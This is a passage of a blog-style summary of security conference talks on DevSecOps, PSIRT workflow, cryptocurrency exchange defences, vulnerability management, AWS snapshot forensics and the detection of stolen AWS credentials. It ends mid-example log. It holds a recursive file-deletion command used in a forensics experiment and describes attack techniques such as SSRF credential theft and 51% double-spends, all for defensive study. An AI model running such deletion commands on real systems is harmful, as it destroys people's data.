Works at Segment, a rapidly growing startup. When you join a startup, you never know how someone is going to receive security. You could have had the best AppSec in the world at your previous place, but when you go to a new company, it’s completely different. They don’t know who you are, they may not trust you, but they suspect that you’re there to slow them down. So it’s about figuring out what the dev workflow looks like, and being able to embed what you want to accomplish into their workflow so devs don’t feel like you’re telling them “no” or giving them a bunch of work. You want them to feel like you’re weaving it into their day to day that’s already happening.

They’ve found a lot of success with embedding security engineers in dev teams and having them build something with the devs. This shows you what devs struggle with on a day to day basis, what they have to deal with, and enables you to bring these insights back to the security team. You’ll model secure development for them that they can copy once you leave, and you’ll meet devs who are passionate about security who you can later mentor and encourage to be security champions.

The closer you can bring in the rest of engineering the better. The security team should not be seen as separate, you should be seen as a partner and a critical part of how engineering builds things.

Check out Leif Dreizler’s talk Working with Developers for Fun and Progress for more details on how Segment embeds security engineers in dev teams, as well as how they do training, vendor adoption, and more.

Richard
Meets upfront with engineering leads on teams and takes them to lunch. First impressions are crucial. They’ll remember 3 years later that you took them to lunch. You have to establish a dialogue with people you’re going to be working quite closely with.

How does DevOps change things and how do you adopt DevSecOps?

Bruce
Views DevSecOps as “the perfect world where the security team and the operations team and the development team all get together to build applications that meet business needs and protect consumers and shareholders.”

To him, the #1 challenge with DevSecOps is that it doesn’t include the business. His primary challenge is getting the business to understand the complexity of building the apps they try to run things on.

He believes it should instead be called something like “DevSecBizOps,” because we need to add the business side into things.

Martin
DevOps’ value is velocity, taking the standard change and build processes and enabling devs to ship code quickly. We can also talk about DevSecOps as quality, not just security.

Coleen
She doesn’t like the term “DevSecOps,” because when we mash things together as a community, each person has a different idea of what it is and what it means. To her, it means that we see what the dev process actually is, where flaws are coming up, where certain teams need more education, where certain teams need to slow down, and where security automation should be added: deconstructing the whole process and figuring out how we can reconstruct it with security along the way.

The devs she works with are happy to receive security advice and go through these extra steps because their nightmare scenario is deploying code that leads to a breach and headlines. Dev teams view the security team as helping them prevent these catastrophes.

There can be contention at times, but when the security team sits with devs and explains why certain practices are being used and their value, dev teams get it and see that security is there to help.

Describe your approach to using SAST, DAST, code review, bug bounty, and pen testing.

Martin
SAST can be a double-edged sword: you’re telling a dev that they’ve made it this far but have to go back. The best way he’s seen to do this is to view it as an education opportunity: if you find the same problem over and over from the same repo or dev, help them get better. Security automation isn’t the answer, ultimately you want to instruct devs.

They’ve explored using bug bounty. It’s a lower cost model in which you get nebulous testing capabilities against assets that are in scope, but it does provide the value that it’s another opportunity for educating devs.

Shyama
She joined her current company when they had no security team but they already had a bug bounty program. She felt like they weren’t sophisticated enough to have the bug bounty program yet - the issues that were found didn’t add much value to the org. She put the program on hold until they were ready to take it on.

They get third-party pen tests with letters of attestation, which is a selling point for their customers. They also use pen testing as assurance for third parties they use.

Coleen
However you’re going to grow your org, at the end you’ll have a suite of things testing your code. There can be a lot of value in SAST and DAST, but you’ll probably go through a really long PoC and find that tools only partially work. Her challenge with SAST is that it requires lots of tuning and finds many FPs. This is an issue as you don’t want to give a raw report of 1000s of potential issues to devs.

As they’re building out their suite of tools for testing, they’ve found pen tests great for coverage as well as helping customers and ISO auditors feel good.

Segment has found bug bounty quite useful, depending on the researchers who are engaged. When a researcher writes up a really good PoC for an issue, you can weaponize it - when their security team submits it to the dev team, they drop everything and scramble to fix it, as it’s an issue found by someone external to their org who doesn’t know how everything works. This definitely lights a fire under everyone’s asses.

Richard
It helps to have someone on the security team with dev experience so they can participate in discussions around the validity of SAST and DAST findings to determine if the claimed mitigating controls are in fact appropriate.

Bruce
SAST and DAST are not a hammer - don’t beat up devs until they get things right. The idea is to find teachable moments. We shouldn’t have to wait for SAST/DAST scans for the smart people who work for us to find these things and autocorrect.

Work together as a team using the tools that make sense. Bug bounty is a tool. If it doesn’t make sense, don’t waste time and effort on it.

You don’t want to cause friction between security and engineering if a tool is finding things your org doesn’t care about.

What’s the most important bit of advice you can share with security leaders and devs to help the security team and devs engage together?

Coleen
Their security training, which aims to teach devs to think like a hacker, has been hugely successful. They use OWASP Juice Shop for hands-on practice, give tailored examples based on Segment’s tech stack, and they’ve asked devs to write up what they’d like to get out of the training to ensure the training meets their needs.

When you’re creating security training, don’t have your security hat on, have your dev hat on. What is it that’s missing from the traditional training you’re giving them? How can you mix things up? Devs are smart, engaged, and want to partner with the security team, make it easy to do that.

Their training has a CTF element, which makes people excited to be on the leaderboard and compete against their friends.

Your security team will never be big enough to keep pace with the rest of the org, so the secret is evangelizing and converting devs into writing code with a security mindset.

Shyama
Staffing is something we all struggle with. She recommends starting by looking internally and plucking people out of various parts of the org who may not even be in tech. She has an excellent security team member who previously worked in the call center.

Bruce
His #1 security hire in the last 2 years was their former receptionist, a political science major who loves security.

“You’ll find people who are really good in all places.”

(Audience question) I’m a member of a developer team, how do you effectively manage upwards?

Coleen
One thing she’s learned working with executives is they don’t want to get in trouble.

Work with your security team to compile stats on the types of flaws your company has. Maybe there’s some disturbing pattern that keeps coming up.

Throw some metrics in front of the executives and do a demo to show how easy it is to use those flaws to create a really scary exploit. This can help make the executive suite aware that when there’s a legitimate risk that you bring them and they decide to ignore it, it’s off your chest and onto theirs. No one wants to be in the headlines.

Show them in black and white, we found this risk in our infrastructure, all someone would have to do is combine this and that to do something serious, and demo it for them.

“It’s like DARE in the 80’s, it gets them scared straight.”

It depends…

Kristen Pascale, Principal Techn. Program Manager, Dell EMC
Tania Ward, Consultant Program Manager, Dell
abstract slides video

Kristen and Tania describe what a PSIRT team is, Dell’s PSIRT team’s workflow, common challenges, and how PSIRT teams can work earlier in the SDLC with development teams to develop more secure applications.

The #1 job of a product security incident response team (PSIRT) is to minimize incidents by managing vulnerabilities. They handle the initial receipt, triage, and internal coordination of vulnerability reports, for example, from an external security researcher. This can be quite challenging, as Dell’s PSIRT team handles thousands of diverse products.

It Depends: The Vulnerability Response Ecosystem
  1. Vulnerability Report: Receive the report from a third-party researcher or other source and ensure it contains sufficient info. Route to the appropriate engineering team.
  2. Investigation: Impact Assessment: The relevant engineering team is responsible for determining if the issue is exploitable and its impact/risk.
  3. Remediation Planning: A timeline for the fix is set and what needs to be done is decided.
  4. Tracking Remedy: Ensuring the vuln is fixed and documentation is created that will be used in the disclosure.
  5. Disclosure: Details of the issue, the fix, and the upgrade path for how customers should secure themselves is distributed to affected parties.

The speakers emphasize that disclosure is the most important part, as it gives customers what they need in order to secure their environment. And when customers reach out asking if they’re affected by a newly publicized issue, like Heartbleed, they want answers fast!

Challenges

There are several fundamental challenges here:

  • The effectiveness of the PSIRT team’s response largely depends on several factors outside of their control. For example, they rely on engineers to do appropriate triaging of an issue to determine its impact and how it should be fixed.
  • If products don’t have an accurate, up-to-date bill of materials (BOM), then it can be a big endeavor to determine if they are affected by a newly disclosed vulnerability.

Another problem they run into is that they’re unable to deliver a timely fix because the upgrade path given by the affected provider or community isn’t compatible with their product - they’ve added features and functionality since they initially embedded the third-party component in the product and haven’t updated it in a long time. Now when they try to update it, things break. Similarly:

  • The component may be embedded in a way that the product requires a major architectural change to update it.
  • The supplier of the component is no longer supporting it. “This has happened a lot.”

This is where the shit hits the iceberg and the clock starts ticking.

It Depends: Continuous Integration / Delivery

Recommendations

Kristen and Tania make a few recommendations:

  • When you’re designing an application, ask yourself, “Have I architected this in a way where I’ll be able to effectively update it in the future?”
  • Consider having a central, managed location hosting third-party code that all projects pull from. This can be invaluable for tracking products’ BOMs and thus easily updating and diagnosing when they’re affected by vulnerabilities in the future.
    • If having an org-wide repository for third-party code is infeasible due to your org’s size, consider having one at a business unit or project level.
  • Have an owner, both org-wide as well as for each product, for the third-party components used. They are responsible for ensuring ownership and management of these dependencies from the start to sunset of the application.
  • Keep track of each product’s BOM using automated tooling. Keep up to date with vulnerabilities that are released for each dependency as well as their current development state: have they not received a patch in several years? Are they being end-of-lifed?
  • Third party components are a part of your system - consider how they change the threat model / attack surface of the apps they’re included in.
  • The PSIRT and development teams need to work together so that everyone understands the downstream effects and total cost of ownership of the third-party dependencies being used.
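To make the BOM point concrete, here's a rough sketch of the "are we affected?" lookup that an accurate BOM makes trivial. The product names, the `affected_products` function, and the flat name-to-version BOM format are all made up for illustration; real BOMs carry far more detail. The only factual bit is that Heartbleed affected OpenSSL 1.0.1 through 1.0.1f, of which two versions are listed here.

```python
from typing import Dict, List, Set

# A BOM here is simply: component name -> version embedded in the product.
Bom = Dict[str, str]


def affected_products(boms: Dict[str, Bom], component: str, vulnerable_versions: Set[str]) -> List[str]:
    """Return the products that embed a vulnerable version of `component`."""
    return sorted(
        product
        for product, bom in boms.items()
        # Products that don't embed the component at all yield None here.
        if bom.get(component) in vulnerable_versions
    )


# Hypothetical products and their BOMs.
boms = {
    "storage-array": {"openssl": "1.0.1e", "zlib": "1.2.8"},
    "backup-agent": {"openssl": "1.0.1g"},
    "mgmt-console": {"zlib": "1.2.8"},
}
print(affected_products(boms, "openssl", {"1.0.1e", "1.0.1f"}))
```

When a customer calls asking whether they're affected by the vulnerability in the news, this kind of query is the difference between answering in minutes and answering in weeks.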

See BoMs Away - Why Everyone Should Have a BoM for more details about automatically creating BOMs.

My Thoughts: Your Mileage May Vary
This recommendation of controlling what third-party dependencies developers can use would be a tough sell in many companies I’ve spoken with, where speed and time to market/iterate are king. Security teams at these companies are responsible for supporting devs in building things securely, but can rarely be blockers or make changes that cause too much friction.

On the Frontlines: Securing a Major Cryptocurrency Exchange

Neil Smithline, Security Architect, Circle
abstract slides video

Neil provides an overview of cryptocurrencies and cryptocurrency exchanges, the attacks exchanges face at the application layer, on wallets, user accounts, and on the currencies themselves, as well as the defenses they’ve put in place to mitigate them.

Background

Cryptocurrencies are blockchain-based, decentralized (ish), tradeable, and fungible (e.g. two $1 bills are equivalent) assets that are secured by cryptography. There were ~1,658 cryptocurrencies as of March 2018.

A cryptocurrency exchange provides a place for buyers and sellers to trade cryptocurrencies. If you want to turn Bitcoin into Ethereum, they provide the connection between the people who are buying and selling.

Cryptocurrency Exchange: Architecture
A high level, approximate architecture diagram of what a cryptocurrency exchange likely looks like.

Overall this mostly looks like a standard web application, but note that instead of a database on the right-hand side, data is stored on the blockchain, which is outside of their control.

Cryptocurrency exchanges are juicy targets because:

  • Transactions are near-instant and withdrawals are final - there’s no way to get the money back (cryptographically impossible).
    • This is quite attractive for criminals, because credit card purchases can be repudiated, bank transfers can be canceled or pulled back, but you can’t do that here.
  • The blockchain is anonymous - while most exchanges require you to prove your identity, once you get on to the blockchain itself it’s fairly anonymous.
  • Evolving regulation and enforcement
  • Truly transnational
  • Massive target - December 2 market cap of top-100: $129,893,042,547.

In the rest of the talk, Neil discusses attacks on the application layer, wallets, user accounts, and on currencies themselves.

Attacks on Application Layer

At the application layer, there’s nothing unique about attacking exchanges, the standard OWASP-style web, mobile, API attacks apply: DDoS, XSS, SQLi, CSRF, credential stuffing, etc.

Attacks on Wallets

Wallets are 3rd-party code running within their firewall/VPC.

They have to trust the wallet dev team to some extent, or otherwise they shouldn’t run the wallet or support the coin.

Circle/Poloniex supports roughly 60 currencies, so they have this trust relationship with a number of third parties. There have been cases in the past where exchanges installed a malicious wallet that stole all the currency they were storing, so this isn’t a hypothetical risk.

Defenses

  • Minimize exposure of wallets to valuable assets
    • Use Docker/VMs
    • Restrict wallet access to private keys when possible (only supported by some wallets)
    • Maintain minimal currency in online “hot” wallet, the rest is stored on offline “cold” wallets. This restricts a successful attacker to only being able to drain the money in “hot” wallets.
  • Supply-chain security
    • Ensure you’re using “official” wallets
    • Verify the identity of wallet developers when communicating with them

Attacks on User Accounts

These types of attacks are not specific to cryptocurrency exchanges.

The core reasoning here is it’s easier to hack a user’s account than an exchange.

Stealing money from banks is much less attractive - how are you going to get the money out? Trying to transfer the money to a bank account you control will still take 3 - 5 days to settle and when the bank finds out they’ll just cancel the transaction, so the attacker won’t get the money.

Circle/Poloniex talks with other exchanges, and they see individual people stealing $1M / month through attacking user accounts.

Example attacks they see include: phishing sites, computer/mobile device malware, fake “support” sites, email account takeovers (ATOs), SIM swapping, domain takeovers, and social engineering of support staff.

Defenses

Strongly encourage (or even require) 2FA - Pester users to add 2FA, and provide strong 2FA (ideally U2F/Yubikey or Google Authenticator rather than SMS).

U2F and Yubikey are preferable, as they’re phishing resistant. Users with Google Authenticator can be phished, where they share the current TOTP value, and they’ve seen some people give away their seed value.

Some exchanges will give you additional functionality once you enable 2FA, e.g. you need it to deposit or withdraw more than a certain amount at once.

If you have a lot of money in your account, SMS isn’t really better than nothing.

They’ve added some protections that for significant operations you need to provide two 2FA codes, separated by at least one time transition, so an attacker has to steal 2 codes to do anything important.
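The "two codes separated by a time transition" check can be sketched with a standard TOTP implementation (RFC 6238, HMAC-SHA1). To be clear, this is my guess at the shape of the idea, not Circle's implementation: `verify_two_codes`, the 30-second period, and the lookback window of 4 steps are all assumptions.

```python
import hashlib
import hmac
import struct


def totp(secret: bytes, time_step: int, digits: int = 6) -> str:
    """RFC 6238 TOTP (HMAC-SHA1) for a given time-step counter."""
    digest = hmac.new(secret, struct.pack(">Q", time_step), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F  # dynamic truncation, per RFC 4226
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def verify_two_codes(secret: bytes, first_code: str, second_code: str,
                     now: float, period: int = 30, window: int = 4) -> bool:
    """Accept only if the two codes are valid for two different, ordered time steps."""
    current = int(now) // period
    steps = range(max(0, current - window), current + 1)
    first_steps = [s for s in steps if hmac.compare_digest(totp(secret, s), first_code)]
    second_steps = [s for s in steps if hmac.compare_digest(totp(secret, s), second_code)]
    # The second code must come from a strictly later time step than the first.
    return any(later > earlier for earlier in first_steps for later in second_steps)


secret = b"12345678901234567890"  # the shared secret used in the RFC test vectors
now = 100  # seconds since the epoch, i.e. time step 3
print(verify_two_codes(secret, totp(secret, 2), totp(secret, 3), now))
print(verify_two_codes(secret, totp(secret, 3), totp(secret, 3), now))
```

Submitting the same code twice fails, so a phisher who captures a single TOTP value can't complete a significant operation with it.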

Other protections:

  • HaveIBeenPwned integration
  • Maximum daily withdrawal limit
  • Anti-phishing service - they partner with a company that crawls the Internet looking for phishing sites and mobile stores for copycat apps and gets them taken down.
  • Lock/restrict account on significant changes, such as the removal of 2FA
  • Risk-based (algorithmic triggered) withdrawal security
    • If something looks phishy, they may make you do a 2FA and/or confirm via email.
    • Other times they’ll block a transaction until they have someone in customer support manually review the transaction. This would be unthinkable in traditional banking, but is not uncommon in cryptocurrencies.

Factors they consider risky include: user with a new IP address, having a recent password/2FA change, new country, use from an email or IP with bad reputation, trading history (some criminals will put a certain amount of value in, then take the same value out, to “launder” it, as they’ll get different Bitcoins back on the withdrawal).
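A toy version of risk-based withdrawal security might look like the following. The signals mirror the factors listed above, but the weights, thresholds, and names (`WithdrawalContext`, `risk_score`, `required_action`) are entirely made up; a real system would tune these against fraud data.

```python
from dataclasses import dataclass


@dataclass
class WithdrawalContext:
    new_ip: bool = False
    new_country: bool = False
    recent_credential_change: bool = False  # password or 2FA changed recently
    bad_reputation: bool = False            # email or IP with bad reputation
    deposit_then_matching_withdrawal: bool = False  # possible laundering pattern


# Hypothetical weights, chosen only for illustration.
WEIGHTS = {
    "new_ip": 1,
    "new_country": 2,
    "recent_credential_change": 3,
    "bad_reputation": 3,
    "deposit_then_matching_withdrawal": 2,
}


def risk_score(ctx: WithdrawalContext) -> int:
    """Sum the weights of every risk signal that is present."""
    return sum(weight for name, weight in WEIGHTS.items() if getattr(ctx, name))


def required_action(score: int) -> str:
    """Map a score to a response; the thresholds are assumptions."""
    if score >= 5:
        return "manual_review"  # hold until customer support reviews it
    if score >= 2:
        return "step_up"        # ask for 2FA and/or email confirmation
    return "allow"


ctx = WithdrawalContext(new_country=True, recent_credential_change=True)
print(risk_score(ctx), required_action(risk_score(ctx)))
```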

See the summaries for Browser fingerprints for a more secure web and Leveraging Users’ Engagement to Improve Account Security for more ideas in protecting user accounts.

Attacks on Currencies

A “51% double-spend attack” lets you spend the same money twice, which requires that the attacker has more hashing power than the rest of the blockchain. This attack has happened in practice: a May 2018 attack on Bitcoin Gold cost 6 different exchanges $18M and a January 2019 attack on Ethereum Classic cost $1.1M.

Cryptocurrency Exchange: Double Spend

Defenses

  • Know your customer (KYC)
  • Withdrawal limits: have a fixed maximum spend/withdrawal limit (lower for new customers) and implement risk-based controls
  • Track the currencies’ health carefully and respond quickly
    • Set confirmations appropriately - They don’t transfer funds until they see at least N confirmations. The more confirmations you require before giving a user the funds, the more expensive it is to do the attack.

They built a tool to show how much it would likely cost to rent the compute power to do a 51% attack, the overall available compute that can be rented, and other factors that may indicate how likely an attack is to occur.
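I don't know how their tool works internally, but the relationship between confirmations and attack cost can be shown with a back-of-the-envelope estimate. This sketch assumes the attacker rents roughly as much hashing power as the honest network, so they mine blocks at about the network's normal rate, and that they need about one more block than the number of confirmations required. The function name and all inputs are hypothetical.

```python
def estimated_attack_cost(confirmations: int, block_time_seconds: float,
                          rental_cost_per_hour: float) -> float:
    """Rough rental cost to out-mine a transaction with N confirmations.

    Simplifying assumptions (not from the talk): the attacker mines at about
    the network's block rate and needs roughly confirmations + 1 blocks.
    """
    blocks_to_mine = confirmations + 1
    hours = blocks_to_mine * block_time_seconds / 3600
    return hours * rental_cost_per_hour


# Hypothetical coin: 10 minute blocks, $1,000/hour to rent enough hash power.
for confirmations in (2, 5, 11):
    print(confirmations, estimated_attack_cost(confirmations, 600, 1000.0))
```

Under these assumptions the cost grows linearly with the confirmation count, so an exchange can raise N for a coin until the estimated cost exceeds what an attacker could plausibly withdraw.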

If you’re into smart contract security, check out the Decentralized Application Security Project (DASP) Top 10, it’s basically the OWASP Top 10 but for smart contracts.

The Art of Vulnerability Management

Alexandra Nassar, Senior Technical Program Manager, Medallia
Harshil Parikh, Director of Security, Medallia
summary abstract slides video

In this talk, Alexandra Nassar of Medallia describes how to create a positive vulnerability management culture and process that works for engineers and the security team.

  • Meet with engineers to understand their workflow and pain points in your current vulnerability management process. Learn the systems and tools they use and how they use them.
  • Use development teams' language and terminology whenever possible to maximize inter-team understanding and minimize confusion.
  • Fit the vulnerability management process into how development teams currently work; do not force them to use an external tool, the friction is too high.
  • Every security ticket that reaches development teams should a) be verified to be a true positive, b) contain all of the relevant contextual information so developers can understand the issue and its relative importance, and c) have clear, actionable guidance on how to fix it. Adopt a customer service-type of interaction model with development teams.
  • Create a single, all-encompassing vulnerability management process that all vulnerabilities flow through: a single entry point and process that is followed, from entry, to triage, to resolution. Create this process based on interviewing development and security teams to understand their needs, and manually sample previous bugs to determine what bug "states" were needed in the past.
    • Once you make process changes, meet with all of the affected teams to ensure they understand why the changes were made and how they can effectively adopt the new process; don't assume they'll automatically get it.
  • Determine the set of meta info you're going to track about vulnerabilities and track them consistently; for example, the severity ("priority"), CVSSv3 score and vector, relevant team and/or project, release tag, the source that found it (pen test, bug bounty, etc.), and its due date.
  • Track metrics over time (number of bugs found, by source, by criticality, number of bugs past SLA, etc.). Use these metrics to diagnose process problems as well as areas that merit deeper investment from the security team for more systematic, scalable wins. Share metrics with leadership so they understand the current state of affairs, and consider using metrics to cause some healthy competition between teams.
  • Get your colleagues excited about security via internal marketing efforts, like gamifying security metrics, holding CTFs and bug bashes, and distributing swag, like stickers, t-shirts, or custom badges for people who make efforts in security.
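To make the metadata and metrics bullets above a little more concrete, here is a minimal Python sketch. The `VulnTicket` class, its field names, the sample tickets, and both helper functions are hypothetical illustrations, not Medallia's actual schema or tooling.

```python
from collections import Counter
from dataclasses import dataclass
from datetime import date
from typing import List, Optional


@dataclass
class VulnTicket:
    """Hypothetical record of the meta info tracked for each vulnerability."""
    title: str
    priority: str        # severity, phrased in the dev teams' own terminology
    cvss_score: float    # CVSSv3 base score
    cvss_vector: str     # CVSSv3 vector string
    team: str
    source: str          # e.g. "pen test", "bug bounty"
    due_date: date
    resolved_on: Optional[date] = None


def past_sla(tickets: List[VulnTicket], today: date) -> List[VulnTicket]:
    """Return unresolved tickets whose due date has already passed."""
    return [t for t in tickets if t.resolved_on is None and t.due_date < today]


def count_by_source(tickets: List[VulnTicket]) -> Counter:
    """Count tickets per discovery source."""
    return Counter(t.source for t in tickets)


# Made-up sample data, for illustration only.
tickets = [
    VulnTicket("SQL injection in login", "P1", 9.8,
               "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
               "web", "bug bounty", date(2019, 2, 1)),
    VulnTicket("Verbose error messages", "P3", 5.3,
               "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
               "api", "pen test", date(2019, 6, 1)),
]
overdue = past_sla(tickets, today=date(2019, 3, 1))
```

Tracking the same fields on every ticket is what makes metrics such as "bugs past SLA" or "bugs by source" cheap to compute later.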

Read the full summary here.



Cloud Security

Cloud Forensics: Putting The Bits Back Together

Brandon Sherman, Cloud Security Tech Lead, Twilio
abstract slides video

Brandon describes an experiment he did in AWS forensics (e.g. Does the EBS volume type or instance type matter when recovering data?) and gives some advice on chain of custody and cloud security best practices.

Motivation

If something bad happens, how can we determine how bad that something was?

Compromises happen, so we need to build detection capabilities and processes for doing forensic investigations. These investigations should have a rigorous, repeatable process: post-incident is not the time to be developing techniques. Ad hoc forensic processes can lead to important data being lost.

One thing that motivated Brandon to pursue this research was curiosity: how can one determine if an attacker tried to cover their tracks? Have they deleted log files, caused log files to roll over, used a dropper that erased itself, something else?

The Cloud

This talk focuses on AWS, and specifically the following services:

  • Elastic Compute Cloud (EC2): VMs on demand.
  • Elastic Block Store (EBS): A virtually attached disk, kind of like network attached storage. You can specify its size, where you want to attach it, and there are various backing storage options.
  • Identity and Access Management (IAM): Fine-grained access controls that enable you to dictate who can perform which API calls on what resources.
  • Simple Storage Service (S3): Key-value store of binary blobs. When EBS volumes are snapshotted, they can be stored as objects in S3.

The slides give other useful info about these services that I’m skipping here for brevity.

Open Questions

In this work, Brandon sought to answer the following questions:

  1. If a snapshot of an EBS volume is taken, will that snapshot only contain in-use blocks, or are deleted blocks also included?
  2. Does it matter what the original EBS volume type is? Has AWS changed their implementation between versions?
  3. Does the instance type matter? Does NVMe vs SATA make a difference?

Experiment Process

Brandon’s methodology was the following:

  1. Launch a selection of EC2 instances (nano, medium, large, etc.)
  2. Attach one of each EBS volume type to each class of instance
  3. Write files (known seed files)
  4. Delete files
  5. Snapshot disks
  6. Rehydrate snapshot to new disk
  7. Look for files

The write and delete steps (3 and 4) used commands like the following:

sudo aws s3 sync s3://seed-forensics-files /mnt/forensic_target
sync && sleep 60 && sync && sleep 60
rm -rf /mnt/forensic_target/*
sync && sleep 60 && sync && sleep 60

Tools / Scripts Used

PhotoRec is free software that can find deleted files, originally created for recovering photos from camera SD cards. It does this by looking at the raw blocks of a disk and comparing the data to known file signatures (e.g. magic bytes).
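As a rough illustration of signature-based recovery, the Python sketch below scans a byte string for the PDF header and trailer markers. It is a deliberately simplified toy, not PhotoRec's actual algorithm; the `carve_pdfs` function and the simulated `disk` contents are made up for this example.

```python
PDF_HEADER = b"%PDF-"    # magic bytes that begin a PDF file
PDF_TRAILER = b"%%EOF"   # marker that conventionally ends a PDF file


def carve_pdfs(raw: bytes) -> list:
    """Return byte strings that look like PDFs inside a raw disk image."""
    found = []
    start = raw.find(PDF_HEADER)
    while start != -1:
        end = raw.find(PDF_TRAILER, start)
        if end == -1:
            break  # header with no trailer: cannot tell where the file ends
        found.append(raw[start:end + len(PDF_TRAILER)])
        start = raw.find(PDF_HEADER, end)
    return found


# Simulated raw blocks: leftover bytes surrounding one "deleted" PDF.
disk = b"\x00" * 16 + b"%PDF-1.4 fake body %%EOF" + b"\xff" * 16
carved = carve_pdfs(disk)
```

File types without a clear header or trailer give a scanner like this nothing to anchor on, so it has to guess at the boundaries.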

Brandon wrote a script, forensics.rb, that will rehydrate each snapshot to an EBS volume, attach it to an instance, run PhotoRec and look for deleted files.

Results: Comparing File Hashes

Many files were dumped into the recovery directory, and not all were seed files written to disk during the experiment. One potential cause is that the files could be recovered from the AMI: AMIs are snapshots and thus contain deleted files.

Frequently, more files were returned than originally seeded to disk, even when a non-root volume was used, as PhotoRec has to guess where files begin and end. Text files, for example, don’t have clearly defined magic numbers and end of file markers.

So Brandon instead tried comparing the first n bytes of recovered files to the original files, where n can be set based on your tolerance for false positives.
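A minimal Python sketch of that prefix comparison follows. The `same_prefix` helper, the file names, and the sample contents are assumptions for illustration; Brandon's actual script may work differently.

```python
import tempfile
from pathlib import Path


def same_prefix(recovered: Path, original: Path, n: int) -> bool:
    """Return True if the first n bytes of both files are identical."""
    with recovered.open("rb") as r, original.open("rb") as o:
        return r.read(n) == o.read(n)


with tempfile.TemporaryDirectory() as tmp:
    seed = Path(tmp, "seed.txt")
    carved = Path(tmp, "f0001.txt")
    seed.write_bytes(b"known seed contents")
    # Simulate a carved file that runs past the real end of the original.
    carved.write_bytes(b"known seed contents" + b"\x00garbage")

    # A whole-file comparison (what a hash check amounts to) fails...
    whole_file_match = seed.read_bytes() == carved.read_bytes()
    # ...but a prefix comparison still recognizes the seed file.
    prefix_match = same_prefix(carved, seed, n=16)
```

A smaller `n` tolerates more trailing junk but raises the chance that two unrelated files happen to share a prefix.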

Results: Comparing File Bytes

  • Source instance type (SATA vs NVMe) had no detectable effect
  • Recovery success varied based on source volume type
    • Best recovery rates: standard, gp2, io1 (80+%)
    • Less good: sc1, st1 (20-50%)
  • Some weird artifacts were recovered
  • Recovery of PDFs from sc1/st1 based drives resulted in massive files (but not other drive types)

Why? The root cause for these results was not easy to determine.

On the Research Process

In the Q&A section, one audience member asked if the observed results were indicative of PhotoRec vs tools specifically made for these sorts of forensics uses. As Brandon only used PhotoRec, he said the results could be a function of the tool itself or the nature of the volumes examined, though some aspects seemed endemic to a given volume type.

I thought this was a good question. In general, when you're doing research projects, it's easy to be focused on the details as you get into the weeds, but it can be useful to periodically step back and ask meta questions about your methodology, like:

Are there other factors or confounding variables that might make my experiment not as conclusive as I'd like?

I really liked how Brandon decided on the research questions he wanted to answer, determined a methodology for answering them, and then ran his process across many combinations of instance and EBS volume types. It would have been easy to do this less rigorously, but that would have made the results and the talk weaker.

My approach when doing research is kind of like agile prototyping a new product: get as much early critical feedback as possible, even in just the ideation phase, to vet the idea. Specifically, I try to run ideas by experienced security colleagues who can help determine:

  • How useful is this idea? To whom?
  • Has it already been done before?
  • Is there related work that I should make sure to examine before starting?
  • How can I differentiate from prior work?
  • Would a different angle or tack make this work more impactful, useful, or meaningful?

After this verbal trial by fire, if the idea passes muster, I make a reasonable amount of progress and then run it by colleagues again. These check-ins can be valuable checkpoints, as the work is more defined (the tools used and your approach become concrete rather than theoretical) and you have some preliminary results that can be discussed.

This approach has made every research project I've ever done significantly better. It can be scary opening your idea up for criticism, but I can't emphasize enough how useful this is.

Chain of Custody

An attacker who has gained access to your AWS account could delete snapshots as you take them, causing valuable forensic data to be lost.

It’s best to instead copy all snapshots to another, secured account.

AWS accounts are like “blast walls” - an explosion in one account cannot reach other accounts, limiting the blast radius.

Brandon advises enabling AWS CloudTrail, which records most API calls (what was done, by whom, and from where), and writing the log files to an account separate from the one CloudTrail is running in.

Takeaways

What does your threat model look like?
This influences how you structure accounts, what and how much you log, etc. Understand the limitations of the tools and services you’re using.

Consider writing only to non-root EBS volumes
This eliminates the large number of recoverable files deleted from the AMI, potentially making forensic tools less noisy.

Use multiple AWS accounts
So that a breach of a server doesn’t mean a breach of everything. Again, having separate accounts limits the blast radius. Enable CloudTrail and keep everything related to forensics as isolated as possible.

Be careful what you write to an AMI, especially if it’s going to be shared
If you write sensitive info (such as secrets) to your AMI as part of the baking process, it could be recovered.

Detecting Credential Compromise in AWS

Will Bengston, Senior Security Engineer, Netflix
abstract slides paper video

Will describes a process he developed at Netflix to detect compromised AWS instance credentials (STS credentials) used outside of the environment in which they were issued. And it doesn’t even use ML!

Detecting Credential Compromise in AWS: Not ML
If Will had said ‘machine learning’ and thrown in ‘blockchain’, he’d probably be relaxing on a beach sipping margaritas with those sweet VC dollaz, rather than giving this talk. But fortunately for the security community, he’s continuing to share more awesome security research.

The AWS Security Token Service (STS) is a web service that enables you to request temporary, limited-privilege credentials for AWS Identity and Access Management (IAM) users or for users that you authenticate (federated users).

What’s the Problem?

When you create a credential in AWS, it works anywhere - in your environment or from anywhere on the Internet. Will and his colleagues wanted to lock this down, so that Netflix AWS credentials could only be used from instances owned by Netflix.

This is important because attackers can use vulnerabilities like XXE and SSRF to steal AWS instance credentials and use them to steal sensitive customer data or IP, spin up many servers to do cryptomining, cause a denial of service to Netflix’s customers, and more.

AWS GuardDuty can detect when instance credentials are used outside of AWS, but not when they are used by attackers operating within AWS.

How do we detect when a credential is used outside of our environment?

Why is this Hard?

This is challenging because of Netflix’s scale (they have 100,000’s of instances at any given point in time) and because their environment is very dynamic: the IP addresses they control are constantly changing, so it’s not trivial to determine which IPs they own at a given point in time.

Another aspect that makes this hard is AWS’s API rate limiting - using the AWS APIs to fully describe their environment across the 3 regions they’re in takes several hours.

The solution Will ended up finding successful leverages CloudTrail.

CloudTrail

AWS CloudTrail provides event history of your AWS account activity, including actions taken through the AWS Management Console, AWS SDKs, command line tools, and other AWS services.

These logs are accessible via the console, or you can have them delivered to S3 or CloudWatch Logs. Note that the delivered logs can be 15 to 20 minutes delayed, so any detection based on these logs will be a bit delayed as well.

Here’s an example CloudTrail log file from the docs:

{"Records": [{
    "eventVersion": "1.0",
    "userIdentity": {
        "type": "IAMUser",
        "principalId": "EX_PRINCIPAL_ID",
        "arn": "arn:aws:iam::123456789012:user/Alice",
        "accessKeyId": "EXAMPLE_KEY_ID",
        "accountId": "123456789012",
        "userName": "Alice"
    },
    "eventTime": "2014-03-06T21:22:54Z",
    "eventSource": "ec2.amazonaws.com",
    "eventName": "StartInstances",
